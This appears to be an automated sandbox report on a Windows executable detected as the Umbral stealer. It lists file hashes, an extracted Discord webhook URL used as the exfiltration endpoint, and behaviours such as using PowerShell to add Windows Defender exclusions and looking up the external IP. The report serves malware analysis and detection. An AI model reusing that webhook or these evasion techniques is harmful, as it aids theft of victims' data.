General
-
Target
5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84.zip
-
Size
92KB
-
Sample
240612-2x7mvaxgnk
-
MD5
c561219802d64420e3eb701d17533337
-
SHA1
7a41248380246af450c3967c02cb313fdddc3049
-
SHA256
5a72cef1aee6243c81a9ec709be05ef1d443f1431ba635392e88fe761708ed42
-
SHA512
78d5f6323e535e4b683fe8de990d013f187e712fc095b1327438d51ba8be1c7d8603ad04e269504907fbba129aa84410d3c7b80d22b088d2367cab9e91a80b7e
-
SSDEEP
1536:Dwa/5M3IBpELnvaRh9l+GxGwYJmaQJbn15fX2NsG5pBjZDa21Li:USM3QevaNl+GUDYbrOOG5pVZLLi
Behavioral task
behavioral1
Sample
5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84.exe
Resource
win7-20240508-en
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1248607651387146310/L22eWHFIaqQanWIJXuwKJbdlgO8LfAMUL1ag9JLuvBFDDekhSwD3f38KvJADfkAUnTsK
Targets
-
-
Target
5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84.exe
-
Size
229KB
-
MD5
1adeea63d576dea9add98e01e9fe78b4
-
SHA1
8f754fd661d9ce2e9e9a7278b4dd7096b13fc585
-
SHA256
5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84
-
SHA512
0ba3c5555273a15c5406f0bd1b5f1a3888814bdbb4130f80eae1f973497c4e5d81a92ed0797a55316b358a42a955fe44f476d1e0e90c15211dc30f4dd20c58cb
-
SSDEEP
6144:lloZMCrIkd8g+EtXHkv/iD4sodaBPUonIWvRsY99ib8e1miLZi:noZZL+EP8sodaBPUonIWvRsY9wfLA
-
Detect Umbral payload
-
Command and Scripting Interpreter: PowerShell
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-